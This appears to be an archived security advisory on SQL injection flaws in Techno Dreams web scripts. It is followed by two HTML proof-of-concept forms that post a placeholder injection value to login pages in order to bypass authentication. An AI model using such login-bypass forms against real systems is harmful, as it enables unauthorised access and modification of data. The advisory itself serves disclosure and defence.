31 lines
No EOL
1.4 KiB
HTML
31 lines
No EOL
1.4 KiB
HTML
source: https://www.securityfocus.com/bid/15215/info
|
|
|
|
Multiple Techno Dreams scripts are prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input before using it in SQL queries.
|
|
|
|
Successful exploitation could result in a compromise of the applications, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
|
|
|
|
<html>
|
|
<h1>Techno Dreams Announcement - Guestbook - WebDirectory Script
|
|
Login-Bypass PoC - Kapda `s advisory </h1>
|
|
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
|
|
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
|
|
Institute
|
|
of Iran</a></p>
|
|
<form method="POST" action="http://www.example.com/admin/login.asp">
|
|
<input type="hidden" name="userid" value="[SQL Injection]">
|
|
<input type="hidden" name="passwd" value="1">
|
|
<input type="submit" value="Submit" name="submit">
|
|
</form></html>
|
|
|
|
<html>
|
|
<h1>Techno Dreams Mailing List Script Login-Bypass PoC - Kapda `s
|
|
advisory </h1>
|
|
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
|
|
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
|
|
Institute
|
|
of Iran</a></p>
|
|
<form method="POST" action="http://www.example.com/login.asp">
|
|
<input type="hidden" name="userid" value="[SQL Injection}">
|
|
<input type="hidden" name="passwd" value="1">
|
|
<input type="submit" value="Submit" name="submit">
|
|
</form></html> |